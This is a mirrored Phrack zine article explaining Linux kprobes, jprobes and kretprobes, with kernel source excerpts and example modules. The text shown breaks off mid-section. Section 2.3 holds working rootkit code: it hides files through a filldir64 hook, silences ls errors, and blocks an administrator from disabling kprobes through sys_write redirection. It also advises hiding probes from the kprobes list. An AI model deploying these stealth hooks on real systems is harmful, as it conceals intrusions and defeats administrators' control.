mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
1778 lines
59 KiB
Text
1778 lines
59 KiB
Text
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x43, Phile #0x06 of 0x10
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=--------------=[ Kernel instrumentation using kprobes ]=---------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=--------------------------=[ by ElfMaster ]=---------------------------=|
|
|
|=----------------------=[ elfmaster@phrack.org ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
1 - Introduction
|
|
1.1 - Why write it?
|
|
1.2 - About kprobes
|
|
1.3 - Jprobe example
|
|
1.4 - Kretprobe example & Return probe patching technique
|
|
|
|
2 - Kprobes implementation
|
|
2.1 - Kprobe implementation
|
|
2.2 - Jprobe implementation
|
|
2.3 - File hiding with jprobes/kretprobes and modifying kernel .text
|
|
2.4 - Kretprobe implementation
|
|
2.5 - A quick stop into modifying read-only kernel segments
|
|
2.6 - An idea for a kretprobe implementation for hackers
|
|
|
|
3 - Patch to unpatch W^X (mprotect/mmap restrictions)
|
|
|
|
4 - Notes on rootkit detection for kprobes
|
|
|
|
5 - Summing it all up.
|
|
|
|
6 - Greetz
|
|
|
|
7 - References and citations
|
|
|
|
8 - Code
|
|
|
|
|
|
|
|
---[ 1 - Introduction
|
|
|
|
----[ 1.1 - Why write it?
|
|
|
|
I will preface this by saying that kprobes can be used for anti-security
|
|
patching of the kernel. I would also like to point out that kprobes are not
|
|
the most efficient way to patch the kernel or write rootkits and backdoors
|
|
because they simply require more work -- extra innovation.
|
|
So why write this? Because... we are hackers. Hackers should be aware of
|
|
any and all resources available to them -- some more auspicious than
|
|
others -- Nonetheless, kprobes are a sweet deal when you consider that they
|
|
are a native kernel API that are ripe for abuse, even without exceeding
|
|
their scope. Due to limitations discussed later on, kprobes require some
|
|
extra innovation when determining how to perform certain tasks such as file
|
|
hiding and applying other interesting patches that could subvert or even
|
|
harden the kernels integrity.
|
|
|
|
|
|
----[ 1.2 - About kprobes
|
|
|
|
It is with no doubt that the best introduction to kprobes is in the Linux
|
|
kernel source documentation that contains kprobes.txt. Make sure to read
|
|
that when you get a chance. Kprobes are a debugging API native to the Linux
|
|
kernel that is based on the processors debug registers -- whatever the
|
|
processor may be. We are going to assume x86, which at this time has the
|
|
most kprobe code developed.
|
|
|
|
--From kprobes.txt --
|
|
|
|
Kprobes enables you to dynamically break into any kernel routine and
|
|
collect debugging and performance information non-disruptively. You
|
|
can trap at almost any kernel code address, specifying a handler
|
|
routine to be invoked when the breakpoint is hit.
|
|
|
|
There are currently three types of probes: kprobes, jprobes, and
|
|
kretprobes (also called return probes). A kprobe can be inserted
|
|
on virtually any instruction in the kernel. A jprobe is inserted at
|
|
the entry to a kernel function, and provides convenient access to the
|
|
function's arguments. A return probe fires when a specified function
|
|
returns.
|
|
|
|
--
|
|
|
|
Based on this definition one can imagine that this kprobes interface may be
|
|
used to instrument the kernel in some useful ways, both for security and
|
|
anti-security; That is what this paper is about. In the recent past I
|
|
implemented some relatively powerful and complex security patches
|
|
using kprobes. That is not to say that other patching methods are
|
|
not still useful, but occasionally one may run into issues using traditional
|
|
methods such as kernel function trampolines which are not SMP safe due
|
|
to the non-atomic nature of swapping code in and out. kprobes are a native
|
|
interface which is nice, but they still present some challenges due to
|
|
limitations we discuss throughout the paper. Kprobes can be used to patch
|
|
the kernel in some places, but cannot be used for everything. This a treatise
|
|
that can shed some light on when and where kprobes can be used to modify
|
|
the behavior of the kernel. Sometimes they must be used in conjunction with
|
|
another patching method. Before we move on I wanted to point out the following
|
|
few facts:
|
|
|
|
kprobes show up as being registered here:
|
|
|
|
/sys/kernel/debug/kprobes/list
|
|
|
|
And can be enabled or disabled by writing a 0 or a 1 here:
|
|
|
|
/sys/kernel/debug/kprobes/enabled
|
|
|
|
The kprobe source code is located in the following locations:
|
|
/usr/src/linux/kernel/kprobes.c
|
|
/usr/src/linux/arch/x86/kernel/kprobes.c
|
|
|
|
Keep in mind that jprobes/kretprobes are 100% based on kprobes and
|
|
disabling kprobes like shown above will prevent any kretprobe/jprobe
|
|
code from working as well.
|
|
|
|
Moving on...
|
|
|
|
|
|
----[ 1.3 - Jprobe example
|
|
|
|
In this paper we will be working primarily with jprobes and kretprobes.
|
|
As shown in the kprobe documentation already, there are several functions
|
|
available for registering and unregistering these probes.
|
|
|
|
Lets pretend for a moment that we are interested in sys_mprotect, and we want
|
|
to inspect any calls to it, and the args that are being passed. For this
|
|
we could register a jprobe for sys_mprotect. The following code outlines the
|
|
general idea here. And consider that because we are setting a jprobe on
|
|
a syscall, we need to either declare our jprobe handler using 'asmlinkage'
|
|
magic, otherwise we must get our args directly from the registers. In our
|
|
example I will get the args directly from the registers just to show how
|
|
to obtain the registers for the current task.
|
|
|
|
-- jprobe example 1 --
|
|
|
|
|
|
NOTE: The jprobe data types will be explained in detail in 2.2 [Jprobe
|
|
implementation]
|
|
|
|
int n_sys_mprotect(unsigned long start, size_t len, long prot)
|
|
{
|
|
struct pt_regs *regs = task_pt_regs(current);
|
|
|
|
start = regs->bx;
|
|
len = regs->cx;
|
|
prot = regs->dx;
|
|
|
|
printk("start: 0x%lx len: %u prot: 0x%lx\n", start, len, prot);
|
|
jprobe_return();
|
|
return 0;
|
|
}
|
|
|
|
/*
|
|
The following entry in struct jprobe is 'void *entry'
|
|
and simply points to the jprobe function handler that will
|
|
be executing when the probe is hit on the function entry
|
|
point.
|
|
*/
|
|
|
|
static struct jprobe mprotect_jprobe =
|
|
{
|
|
.entry = (kprobe_opcode_t *)n_sys_mprotect // function entry
|
|
};
|
|
|
|
static int __init jprobe_init(void)
|
|
{
|
|
/* kp.addr is kprobe_opcode_t *addr; from struct kprobe and */
|
|
/* points to the probe point where the trap will occur. In */
|
|
/* our case we are probing sys_mprotect */
|
|
mprotect_jprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");
|
|
|
|
if ((ret = register_jprobe(&mprotect_jprobe)) < 0)
|
|
{
|
|
printk("register_jprobe failed for sys_mprotect\n");
|
|
return -1;
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
|
|
int init_module(void)
|
|
{
|
|
jprobe_init();
|
|
return 0;
|
|
}
|
|
|
|
void exit_module(void)
|
|
{
|
|
unregister_jprobe(&mprotect_jprobe);
|
|
}
|
|
|
|
|
|
In the above code, we register a jprobe for sys_mprotect. This means that
|
|
a breakpoint instruction is placed on the entry point of the function,
|
|
and as soon as it gets called a trap occurs and control is passed to our
|
|
n_sys_mprotect() jprobe handler. From this point we can analyze data such
|
|
as the arguments passed either in registers or on the stack, as well as any
|
|
kernel data structures. We can also modify kernel data structures, which
|
|
is primarily what we rely on for our patches using kprobes. Any attempts
|
|
to modify the stack arguments or registers will be overriden as soon as
|
|
our handler function returns -- this is because kprobes saves the register
|
|
state and stack args prior to calling the handler, and restores these values
|
|
upon the jprobe_return(), at which point the real syscall or function will
|
|
execute and do its thing. We will get into much more detail on this topic
|
|
and how to actually modify stack arguments later on.
|
|
|
|
|
|
----[ 1.4 - Kretprobe example and return probe patching technique
|
|
|
|
Moving on to kretprobes (Also known as return probes). Without kretprobes it
|
|
wouldn't be as easily possible to patch the kernel using kprobes, this is
|
|
because a kernel function that we set a jprobe on might re-modify a
|
|
kernel data structure that we modify, as soon as our jprobe handler returns.
|
|
If we apply a kretprobe into the situation we can modify that kernel data
|
|
structure after the real kernel function returns. Here is an example...
|
|
Lets say we want to modify the kernel data structure 'kstruct->x' (which is
|
|
ficticious). We want to modify it, but do not know what value we want to
|
|
apply to it until 'function_A' executes, but as soon as the real 'function_A'
|
|
executes after our jprobe handler, it sets the value 'kstruct->x' to something.
|
|
This is where kretprobes come into play. This is the approach we take, which
|
|
we can call the 'return probe patching' technique.
|
|
|
|
1. [jprobe handler for function_A] -> Determines the value that we want to set on kstruct->x
|
|
2. [function_A] -> Sets the value of kstruct->x to some value.
|
|
3. [kretprobe handler for function_A] -> Sets the value of kstruct->x to value determined by jprobe handler.
|
|
|
|
So as you can see, with kretprobes we end up being able to set the final
|
|
verdict on a value.
|
|
|
|
Here is a quick example of registering a kretprobe. We will use sys_mprotect
|
|
for this example as well.
|
|
|
|
The kretprobe data types will be explained in the section 2.4 [kretprobes
|
|
implementation].
|
|
|
|
static int mprotect_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
printk("Original return address: 0x%lx\n", (unsigned long)ri->ret_addr);
|
|
return 0;
|
|
|
|
|
|
}
|
|
static struct kretprobe mprotect_kretprobe =
|
|
{
|
|
.handler = mprotect_ret_handler, // return probe handler
|
|
.maxactive = NR_CPUS // max number of kretprobe instances
|
|
};
|
|
|
|
|
|
int init_module(void)
|
|
{
|
|
mprotect_kretprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");
|
|
register_kretprobe(&mprotect_kretprobe);
|
|
|
|
}
|
|
|
|
As you can see I utilize kallsyms_lookup_name(), but interestingly a probe
|
|
can be set on virtually any instruction within the kernel, whatever means
|
|
you use to get that location is up to you (I.E System.map).
|
|
|
|
|
|
So as you can see, the code is straight forward. From an internal point
|
|
of view-- by the time sys_mprotect returns, the address at the top of
|
|
the stack (the ret address) has been modified to point to a function
|
|
called kretprobe_trampoline() which in turn sets things up to call
|
|
our mprotect_ret_handler() function where we can inspect and modify
|
|
kernel data. No point in modifying the registers because they were
|
|
all saved on the stack and will be reset as soon as our handler returns.
|
|
More on this in the next section. The kretprobe trampoline function will be
|
|
explored in detail in 2.4 [Kretprobe implementation].
|
|
|
|
|
|
---[ 2 - Kprobes implementation
|
|
|
|
----[ 2.1 - Kprobe implementation
|
|
|
|
Firstly I want to make sure we are on the same page about what a basic
|
|
kprobe is, and the general idea of how it works.
|
|
|
|
-- Taken from kprobes.txt:
|
|
|
|
When a kprobe is registered, Kprobes makes a copy of the probed
|
|
instruction and replaces the first byte(s) of the probed instruction
|
|
with a breakpoint instruction (e.g., int3 on i386 and x86_64).
|
|
|
|
When a CPU hits the breakpoint instruction, a trap occurs, the CPU's
|
|
registers are saved, and control passes to Kprobes via the
|
|
notifier_call_chain mechanism.
|
|
Kprobes executes the "pre_handler" associated with the kprobe, passing
|
|
the handler the addresses of the kprobe struct and the saved registers.
|
|
It would be simpler to single-step the actual instruction in place,
|
|
but then Kprobes would have to temporarily remove the breakpoint
|
|
instruction. This would open a small time window when another CPU
|
|
could sail right past the probepoint.
|
|
|
|
After the instruction is single-stepped, Kprobes executes the
|
|
"post_handler," if any, that is associated with the kprobe.
|
|
Execution then continues with the instruction following the probepoint.
|
|
Next, Kprobes single-steps its copy of the probed instruction.
|
|
|
|
--
|
|
|
|
So to clarify, when registering a typical kprobe a pre_handler should
|
|
always be assigned so that you can inspect data or do whatever you want
|
|
during that point. A post handler may or may not be assigned.
|
|
|
|
Since we are primarily using jprobes and kretprobes which are extensions
|
|
of the kprobe interface, I have chosen to primarily discuss their implementation
|
|
more so than a plain kprobe. All you need to know for now is that registering
|
|
a basic kprobe inserts a breakpoint instruction on the desired location, and
|
|
executes a pre and a post handler that you assign. As you will see in the jprobe and
|
|
kretprobe implementations which are implemented using a basic kprobe with
|
|
a pre and post handler, the pre and post handlers point to special kernel
|
|
functions [/usr/src/linux/arch/x86/kernel/kprobes.c] that act as a sort of
|
|
prologue/epilogue for the actual handler that executes the instructions.
|
|
More will be revealed in the following sections.
|
|
|
|
|
|
----[ 2.2 - Jprobe implementation
|
|
|
|
If we are aware of the internal implementation of jprobes and kretprobes
|
|
then we can utilize them better, and we could even patch the interface
|
|
itself to act more like we want it, but this defeats the purpose of this
|
|
paper which aims at patching the kernel using the kprobes interface as it
|
|
is, although we will explore some external modifications of kprobes later
|
|
on.
|
|
|
|
Firstly take a look at the following struct:
|
|
|
|
struct jprobe {
|
|
struct kprobe kp;
|
|
void *entry; /* probe handling code to jump to */
|
|
};
|
|
|
|
When we call register_jprobe() it in turn calls register_jprobes(&jp, 1).
|
|
register_jprobes() is all about setting up the jprobe pre/post and entry
|
|
handler.
|
|
|
|
-- snippet from register_jprobes() in /usr/src/linux/kernel/kprobes.c --
|
|
|
|
/* See how jprobes utilizes kprobes? It uses the */
|
|
/* pre/post handler */
|
|
jp->kp.pre_handler = setjmp_pre_handler;
|
|
jp->kp.break_handler = longjmp_break_handler;
|
|
ret = register_kprobe(&jp->kp);
|
|
--
|
|
|
|
The pre_handler is called before your function/entry handler and is responsible
|
|
for saving the contents of the stack, the registers, and sets the eip. In
|
|
normal circumstances the developer has no control over the pre/post
|
|
handler for jprobes because the kprobe pre and post handler entries within
|
|
struct kprobe do not point to your own custom handlers, but instead to
|
|
specialized handlers specifically for the jprobe prologue/epilogue.
|
|
|
|
/* Called before addr is executed. */
|
|
kprobe_pre_handler_t pre_handler;
|
|
|
|
/* Called after addr is executed, unless... */
|
|
kprobe_post_handler_t post_handler;
|
|
|
|
You could say that the execution of a jprobe looks like this:
|
|
|
|
1. [jprobe pre_handler] Backup stack and register state
|
|
2. [jprobe function handler] Do elite modifications to kernel
|
|
3. [jprobe post_handler] Restore original stack and registers.
|
|
|
|
Lets take a peek at the pre_handler which backs up the stack and registers.
|
|
|
|
int __kprobes setjmp_pre_handler(struct kprobe *p, struct pt_regs *regs)
|
|
{
|
|
struct jprobe *jp = container_of(p, struct jprobe, kp);
|
|
unsigned long addr;
|
|
struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();
|
|
|
|
kcb->jprobe_saved_regs = *regs;
|
|
kcb->jprobe_saved_sp = stack_addr(regs);
|
|
addr = (unsigned long)(kcb->jprobe_saved_sp);
|
|
|
|
/*
|
|
* As Linus pointed out, gcc assumes that the callee
|
|
* owns the argument space and could overwrite it, e.g.
|
|
* tailcall optimization. So, to be absolutely safe
|
|
* we also save and restore enough stack bytes to cover
|
|
* the argument area.
|
|
*/
|
|
memcpy(kcb->jprobes_stack, (kprobe_opcode_t *)addr,
|
|
MIN_STACK_SIZE(addr));
|
|
regs->flags &= ~X86_EFLAGS_IF;
|
|
trace_hardirqs_off();
|
|
regs->ip = (unsigned long)(jp->entry);
|
|
return 1;
|
|
}
|
|
|
|
Pay close attention to the code comment above; Like with Chuck Noris... if Linus
|
|
says it, then it MUST be true!
|
|
|
|
As you can see, the function gets the current stack location using the stack_addr()
|
|
macro, and then memcpy's it over to kcb->jprobes_stack which is a backup of the
|
|
stack to be restored in the post handler. The stack being restored prior to the
|
|
real function being called does impose some obvious restrictions, but that does
|
|
not mean that we can't manipulate the pointer values that are passed on the stack
|
|
which is something we take advantage of in section 2.3 (File hiding). After
|
|
the jprobe handler is finished, the jprobe post handler is called -- here
|
|
is the code.
|
|
|
|
int __kprobes longjmp_break_handler(struct kprobe *p, struct pt_regs *regs)
|
|
{
|
|
struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();
|
|
u8 *addr = (u8 *) (regs->ip - 1);
|
|
struct jprobe *jp = container_of(p, struct jprobe, kp);
|
|
|
|
if ((addr > (u8 *) jprobe_return) &&
|
|
(addr < (u8 *) jprobe_return_end)) {
|
|
if (stack_addr(regs) != kcb->jprobe_saved_sp) {
|
|
struct pt_regs *saved_regs =
|
|
&kcb->jprobe_saved_regs;
|
|
printk(KERN_ERR
|
|
"current sp %p does not match saved sp %p\n",
|
|
stack_addr(regs), kcb->jprobe_saved_sp);
|
|
printk(KERN_ERR "Saved registers for
|
|
jprobe %p\n", jp);
|
|
show_registers(saved_regs);
|
|
printk(KERN_ERR "Current registers\n");
|
|
show_registers(regs);
|
|
BUG();
|
|
}
|
|
*regs = kcb->jprobe_saved_regs;
|
|
memcpy((kprobe_opcode_t *)(kcb->jprobe_saved_sp),
|
|
kcb->jprobes_stack,
|
|
MIN_STACK_SIZE(kcb->jprobe_saved_sp));
|
|
preempt_enable_no_resched();
|
|
return 1;
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
|
|
The code primarily restores the stack and re-enables preemption; probe
|
|
handlers are run with preemption disabled.
|
|
|
|
|
|
----[ 2.3 - File hiding using jprobes/kretprobes
|
|
|
|
Lets consider a simple file hiding approach that consists using the
|
|
dirent->d_name pointer in filldir64().
|
|
|
|
|
|
char *hidden_files[] =
|
|
{
|
|
#define HIDDEN_FILES_MAX 3
|
|
"test1",
|
|
"test2",
|
|
"test3"
|
|
};
|
|
|
|
struct getdents_callback64 {
|
|
struct linux_dirent64 __user * current_dir;
|
|
struct linux_dirent64 __user * previous;
|
|
int count;
|
|
int error;
|
|
};
|
|
|
|
/* Global data for kretprobe to act on */
|
|
static struct global_dentry_info
|
|
{
|
|
unsigned long d_name_ptr;
|
|
int bypass;
|
|
} g_dentry;
|
|
|
|
/* Our jprobe handler that globally saves the pointer value of dirent->d_name */
|
|
/* so that our kretprobe can modify that location */
|
|
static int j_filldir64(void * __buf, const char * name, int namlen, loff_t
|
|
offset, u64 ino, unsigned int d_type)
|
|
{
|
|
|
|
int found_hidden_file, i;
|
|
struct linux_dirent64 __user *dirent;
|
|
struct getdents_callback64 * buf = (struct getdents_callback64 *) __buf;
|
|
dirent = buf->current_dir;
|
|
int reclen = ROUND_UP64(NAME_OFFSET(dirent) + namlen + 1);
|
|
|
|
/* Initialize custom stuff */
|
|
g_dentry.bypass = 0;
|
|
found_hidden_file = 0;
|
|
|
|
for (i = 0; i < HIDDEN_FILES_MAX; i++)
|
|
if (strcmp(hidden_files[i], name) == 0)
|
|
found_hidden_file++;
|
|
if (!found_hidden_file)
|
|
goto end;
|
|
|
|
/* Create pointer to where we need to modify in dirent */
|
|
/* since someone is trying to view a file we want hidden */
|
|
g_dentry.d_name_ptr = (unsigned long)(unsigned char *)dirent->d_name;
|
|
g_dentry.bypass++; // note that we want to bypass viewing this file
|
|
|
|
end:
|
|
jprobe_return();
|
|
return 0;
|
|
}
|
|
|
|
/* Our kretprobe handler, which we use to nullify the filename */
|
|
/* Remember the 'return probe technique'? Well this is it. */
|
|
static int filldir64_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
char *ptr, null = 0;
|
|
/* Someone is looking at one of our hidden files */
|
|
if (g_dentry.bypass)
|
|
{
|
|
/* Lets nullify the filename so it simply is invisible */
|
|
ptr = (char *)g_dentry.d_name_ptr;
|
|
copy_to_user((char *)ptr, &null, sizeof(char));
|
|
}
|
|
}
|
|
|
|
|
|
The code above is quite adept at hiding files based on getdents64 being called
|
|
but unfortunately 'ls' from GNU coreutils will call lstat64 for every d_name found,
|
|
and if some of the d_names start with a null byte then we will see an error returned
|
|
by lstat saying "Cannot access : : file not found". So if we are hiding 3 files, then
|
|
we will see that error message 3 times prior to the directory listing (which will not
|
|
show the hidden files). One of the primary limitations of kprobe patching
|
|
is that we cannot modify the return value of a function; the closest we can get is
|
|
setting up a return probe to modify data that the function may have operated on.
|
|
There are some indirect methods of altering the return value at times, but after
|
|
following the code path for lstat64 I found no way to remedy the issue using kprobes.
|
|
Instead I found the not-so-elegant approach of redirecting the stderr to /dev/null
|
|
by setting a jprobe and a return probe on sys_write. Additionally, while modifying
|
|
sys_write, we might as well redirect any attempts to disable kprobes to /dev/null
|
|
as well. A super user can simply 'echo 0 > /sys/kernel/debug/kprobes/enabled' to
|
|
disable the kprobes interface (We don't want this). One of the parameters we will
|
|
pass to insmod when installing our LKM will be the inode of the 'enabled' /sys entry.
|
|
Below is the code for our modified sys_write.
|
|
|
|
asmlinkage static int j_sys_write(int fd, void *buf, unsigned int len)
|
|
{
|
|
char *s = (char *)buf;
|
|
char null = '\0';
|
|
char devnull[] = "/dev/null";
|
|
struct file *file;
|
|
struct dentry *dentry = NULL;
|
|
unsigned int ino;
|
|
int ret;
|
|
char comm[255];
|
|
|
|
stream_redirect = 0; // do we redirect to /dev/null?
|
|
|
|
/* Make sure this is an ls program */
|
|
/* otherwise we'd prevent other programs */
|
|
/* From being able to send 'cannot access' */
|
|
/* in their stderr stream, possibly */
|
|
get_task_comm(comm, current);
|
|
if (strcmp(comm, "ls") != 0)
|
|
goto out;
|
|
|
|
/* check to see if this is an ls stat complaint, or ls -l weirdness */
|
|
/* There are two separate calls to sys_write hence two strstr checks */
|
|
if (strstr(s, "cannot access") || strstr(s, "ls:"))
|
|
{
|
|
printk("Going to redirect\n");
|
|
goto redirect;
|
|
}
|
|
/* Check to see if they are trying to disable kprobes */
|
|
/* with 'echo 0 > /sys/kernel/debug/kprobes/enabled' */
|
|
file = fget(fd);
|
|
if (!file)
|
|
goto out;
|
|
dentry = dget(file->f_dentry);
|
|
if (!dentry)
|
|
goto out;
|
|
ino = dentry->d_inode->i_ino;
|
|
dput(dentry);
|
|
fput(file);
|
|
if (ino != enabled_ino)
|
|
goto out;
|
|
|
|
redirect:
|
|
/* If we made it here, then we are doing a redirect to /dev/null */
|
|
stream_redirect++;
|
|
mm_segment_t o_fs = get_fs();
|
|
set_fs(KERNEL_DS);
|
|
|
|
n_sys_close(fd);
|
|
fd = n_sys_open(devnull, O_RDWR, 0);
|
|
|
|
set_fs(o_fs);
|
|
global_fd = fd;
|
|
|
|
out:
|
|
jprobe_return();
|
|
return 0;
|
|
}
|
|
/* Here is the return handler to close the fd to /dev/null. */
|
|
static int sys_write_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
if (stream_redirect)
|
|
{
|
|
n_sys_close(global_fd);
|
|
stream_redirect = 0;
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
We close the existing file descriptor and open a new one that will
|
|
use the same fd number. This redirection of stderr to /dev/null is only for the
|
|
current process. To understand it a bit more we can follow the code path of
|
|
do_sys_open(), I've added some extra comments:
|
|
|
|
long do_sys_open(int dfd, const char __user *filename, int flags, int mode)
|
|
{
|
|
char *tmp = getname(filename);
|
|
int fd = PTR_ERR(tmp);
|
|
|
|
if (!IS_ERR(tmp)) {
|
|
fd = get_unused_fd_flags(flags);
|
|
if (fd >= 0) {
|
|
struct file *f = do_filp_open(dfd, tmp, flags,
|
|
mode, 0);
|
|
if (IS_ERR(f)) {
|
|
put_unused_fd(fd);
|
|
fd = PTR_ERR(f);
|
|
} else {
|
|
|
|
/* Notice fsnotify_open() */
|
|
fsnotify_open(f->f_path.dentry);
|
|
|
|
/* Associate fd with /dev/null */
|
|
fd_install(fd, f);
|
|
trace_do_sys_open(tmp, flags, mode);
|
|
}
|
|
}
|
|
putname(tmp);
|
|
}
|
|
return fd;
|
|
}
|
|
|
|
The new file descriptor is associated with its new file (struct
|
|
files_struct *) for the current task using fd_install().
|
|
|
|
void fd_install(unsigned int fd, struct file *file)
|
|
{
|
|
struct files_struct *files = current->files; // <-- notice here
|
|
struct fdtable *fdt;
|
|
spin_lock(&files->file_lock);
|
|
fdt = files_fdtable(files); // <-- notice here
|
|
BUG_ON(fdt->fd[fd] != NULL);
|
|
rcu_assign_pointer(fdt->fd[fd], file); // <-- notice here
|
|
spin_unlock(&files->file_lock);
|
|
}
|
|
|
|
|
|
One important note to the reader is, /sys/kernel/debug/kprobes/list
|
|
the file which shows any registered kprobes. Simply use a redirect
|
|
technique like the one we used above to track open's to that file and
|
|
redirect any writes to stdout to /dev/null if the list contains a
|
|
probe that you have registered. Very trivial, and absolutely necessary
|
|
to maintain a stealth presence.
|
|
|
|
As the topic of rootkits has become trite ...
|
|
I would like to introduce some other kprobe examples. Firstly
|
|
let us discuss the Kretprobe implementation in detail. It will
|
|
give some more insight into the limitations of kprobes and also
|
|
expand your mind on how the kprobe implementation may be modified --
|
|
which is not covered in this paper.
|
|
|
|
|
|
----[ 2.4 - Kretprobe implementation
|
|
|
|
The kretprobe implementation is especially interesting. Primarily because
|
|
it is an innovative and nicely engineered chunk of code. Here is how it
|
|
works.
|
|
|
|
-- From the kprobes.txt --
|
|
|
|
When you call register_kretprobe(), Kprobes establishes a kprobe at
|
|
the entry to the function. When the probed function is called and this
|
|
probe is hit, Kprobes saves a copy of the return address, and replaces
|
|
the return address with the address of a "trampoline." The trampoline
|
|
is an arbitrary piece of code -- typically just a nop instruction.
|
|
At boot time, Kprobes registers a kprobe at the trampoline.
|
|
|
|
The kretprobe implementation is really just a creative way of using
|
|
kprobes by registering them and assigning the trap handlers functions
|
|
that deal with modifying the return address.
|
|
|
|
-- From /usr/src/linux/kernel/kprobes.c --
|
|
|
|
int __kprobes register_kretprobe(struct kretprobe *rp)
|
|
{
|
|
int ret = 0;
|
|
struct kretprobe_instance *inst;
|
|
int i;
|
|
void *addr;
|
|
|
|
... <code> ...
|
|
|
|
rp->kp.pre_handler = pre_handler_kretprobe;
|
|
rp->kp.post_handler = NULL;
|
|
rp->kp.fault_handler = NULL;
|
|
rp->kp.break_handler = NULL;
|
|
|
|
... <code> ...
|
|
}
|
|
NOTE:
|
|
Notice the rp->kp.pre_handler -- kp is struct kprobe
|
|
and the pre_handler is assigned pre_handler_kretprobe.
|
|
|
|
So when the return probe is hit, pre_handler_kretprobe() will call
|
|
arch_prepare_kretprobe() which saves the original return address and inserts
|
|
the new one:
|
|
|
|
void __kprobes arch_prepare_kretprobe(struct kretprobe_instance *ri,
|
|
struct pt_regs *regs)
|
|
{
|
|
unsigned long *sara = stack_addr(regs);
|
|
|
|
ri->ret_addr = (kprobe_opcode_t *) *sara;
|
|
|
|
/* Replace the return addr with trampoline addr */
|
|
*sara = (unsigned long) &kretprobe_trampoline;
|
|
}
|
|
|
|
Notice the last line which sets the return address to the trampoline. The
|
|
trampoline is actually defined in an assembly stub, which for x86 looks
|
|
like this:
|
|
|
|
asm volatile (
|
|
".global kretprobe_trampoline\n"
|
|
"kretprobe_trampoline: \n"
|
|
* Skip cs, ip, orig_ax and gs.
|
|
* trampoline_handler() will plug in these values
|
|
*/
|
|
" subl $16, %esp\n"
|
|
" pushl %fs\n"
|
|
" pushl %es\n"
|
|
" pushl %ds\n"
|
|
" pushl %eax\n"
|
|
" pushl %ebp\n"
|
|
" pushl %edi\n"
|
|
" pushl %esi\n"
|
|
" pushl %edx\n"
|
|
" pushl %ecx\n"
|
|
" pushl %ebx\n"
|
|
" movl %esp, %eax\n"
|
|
" call trampoline_handler\n"
|
|
/* Move flags to cs */
|
|
" movl 56(%esp), %edx\n"
|
|
" movl %edx, 52(%esp)\n"
|
|
/* Replace saved flags with true return address. */
|
|
" movl %eax, 56(%esp)\n"
|
|
" popl %ebx\n"
|
|
" popl %ecx\n"
|
|
" popl %edx\n"
|
|
" popl %esi\n"
|
|
" popl %edi\n"
|
|
" popl %ebp\n"
|
|
" popl %eax\n"
|
|
/* Skip ds, es, fs, gs, orig_ax and ip */
|
|
" addl $24, %esp\n"
|
|
" popf\n"
|
|
#endif
|
|
" ret\n");
|
|
}
|
|
|
|
After the register state is backed up on the stack the stub calls
|
|
trampoline_handler() which essentially executes any return probe
|
|
handlers associated with the kretprobe for the given function. Looking at
|
|
the actual function gives some more insight.
|
|
|
|
static __used __kprobes void *trampoline_handler(struct pt_regs *regs)
|
|
{
|
|
struct kretprobe_instance *ri = NULL;
|
|
struct hlist_head *head, empty_rp;
|
|
struct hlist_node *node, *tmp;
|
|
unsigned long flags, orig_ret_address = 0;
|
|
unsigned long trampoline_address = (unsigned
|
|
long)&kretprobe_trampoline;
|
|
|
|
INIT_HLIST_HEAD(&empty_rp);
|
|
kretprobe_hash_lock(current, &head, &flags);
|
|
/* fixup registers */
|
|
#ifdef CONFIG_X86_64
|
|
regs->cs = __KERNEL_CS;
|
|
#else
|
|
regs->cs = __KERNEL_CS | get_kernel_rpl();
|
|
regs->gs = 0;
|
|
#endif
|
|
regs->ip = trampoline_address;
|
|
regs->orig_ax = ~0UL;
|
|
|
|
/*
|
|
* It is possible to have multiple instances associated with a
|
|
* given
|
|
* task either because multiple functions in the call path have
|
|
* return probes installed on them, and/or more than one
|
|
* return probe was registered for a target function.
|
|
*
|
|
* We can handle this because:
|
|
* - instances are always pushed into the head of the list
|
|
* - when multiple return probes are registered for the same
|
|
* function, the (chronologically) first instance's ret_addr
|
|
* will be the real return address, and all the rest will
|
|
* point to kretprobe_trampoline.
|
|
*/
|
|
hlist_for_each_entry_safe(ri, node, tmp, head, hlist) {
|
|
if (ri->task != current)
|
|
/* another task is sharing our hash bucket */
|
|
continue;
|
|
|
|
if (ri->rp && ri->rp->handler) {
|
|
__get_cpu_var(current_kprobe) = &ri->rp->kp;
|
|
get_kprobe_ctlblk()->kprobe_status =
|
|
KPROBE_HIT_ACTIVE;
|
|
ri->rp->handler(ri, regs);
|
|
__get_cpu_var(current_kprobe) = NULL;
|
|
}
|
|
|
|
orig_ret_address = (unsigned long)ri->ret_addr;
|
|
recycle_rp_inst(ri, &empty_rp);
|
|
|
|
if (orig_ret_address != trampoline_address)
|
|
/*
|
|
* This is the real return address. Any other
|
|
* instances associated with this task are for
|
|
* other calls deeper on the call stack
|
|
*/
|
|
break;
|
|
}
|
|
|
|
kretprobe_assert(ri, orig_ret_address, trampoline_address);
|
|
|
|
kretprobe_hash_unlock(current, &flags);
|
|
|
|
hlist_for_each_entry_safe(ri, node, tmp, &empty_rp, hlist) {
|
|
hlist_del(&ri->hlist);
|
|
kfree(ri);
|
|
}
|
|
return (void *)orig_ret_address;
|
|
}
|
|
|
|
The original return address value is returned, and then the
|
|
kretprobe_trampoline stub copies it onto the stack at the right location.
|
|
At which point all of the saved registers are pop'd and restored--resulting
|
|
in returning to the original calling function with the original return
|
|
value. I suppose it doesn't take an over active imagination to see that the
|
|
kretprobe_trampoline stub code can be modified to return a different
|
|
value. This could be done in several ways, however it would exceed
|
|
the scope of hacking purely with kprobes. The arch_prepare_kretprobe()
|
|
function would have to be patched (And it cannot be patched using a kprobe
|
|
sadly) this is because any functions with a __kprobe in the prototype
|
|
